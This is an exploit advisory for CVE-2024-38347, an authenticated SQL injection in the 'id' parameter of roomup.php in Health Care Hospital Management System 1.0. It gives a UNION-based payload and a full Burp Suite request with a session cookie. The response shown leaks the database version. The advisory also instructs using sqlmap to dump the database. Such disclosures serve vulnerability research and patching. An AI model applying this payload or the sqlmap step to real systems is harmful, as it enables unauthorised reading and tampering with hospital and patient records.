# Exploit Title: Health Care hospital Management System - SQL Injection (Authenticated)
# Date: 2024-06-05
# Exploit Author: Sandeep Rajauriya
# Vendor Homepage: https://code-projects.org/health-care-hospital-in-php-css-js-and-mysql-free-download/
# Software Link: https://download-media.code-projects.org/2020/04/Health_Care_hospital_IN_PHP_CSS_Js_AND_MYSQL__FREE_DOWNLOAD_AkGgvwi.zip
# Version: 1.0
# Tested on: Windows 11, PHP 8.2.12, Apache 2.4.58
# CVE: CVE-2024-38347
------------------------------------------------------------------------------------
1. Description:
----------------------
Health Care hospital Management System 1.0 is vulnerable to authenticated SQL injection through the "id" parameter of the "Room Information" module (HMS/roomup.php): the parameter value is placed into the database query without parameter binding, so a UNION clause supplied by a logged-in user is executed by the database. Exploiting this issue allows an attacker with a valid session to read or modify data in the application's database and, depending on the database configuration, to attack the underlying database server further.
2. Proof of Concept:
----------------------
Log in to obtain a valid PHPSESSID, then confirm the injection on the 'id' parameter of roomup.php with the UNION payload shown in section 3 (the injected first column is echoed back in the page's hidden "ridd" input). Next, point sqlmap at the same parameter with the session cookie to retrieve the hostname and banner and to dump the database contents.
3. Example payload:
----------------------
'+union+select+@@version,null,null,null,null,null,null,null--+
4. Burpsuite HTTP Request on 'id' parameter:
----------------------
GET /HMS/roomup.php?id=-1'+union+select+@@version,null,null,null,null,null,null,null--+ HTTP/1.1
Host: --REDACTED--
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://--REDACTED--/HMS/roomavi.php
Connection: close
Cookie: PHPSESSID=podmt61i233pamo53i63gt78f7
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=1
5. Burpsuite HTTP Response
----------------------
HTTP/1.1 200 OK
Date: Wed, 05 Jun 2024 17:59:44 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 6411
Connection: close
Content-Type: text/html; charset=UTF-8
--REDACTED--
<form method="post" action="">
<div align="left"> Room ID :</div>
<input hidden name="ridd" value="10.4.32-MariaDB" >
<input name="adm_pid" disabled value="10.4.32-MariaDB" style="margin:5px; border-radius:0px" type="text" class="form-control" placeholder="Patient ID" >
<div align="left"> Room Name :</div>
--REDACTED--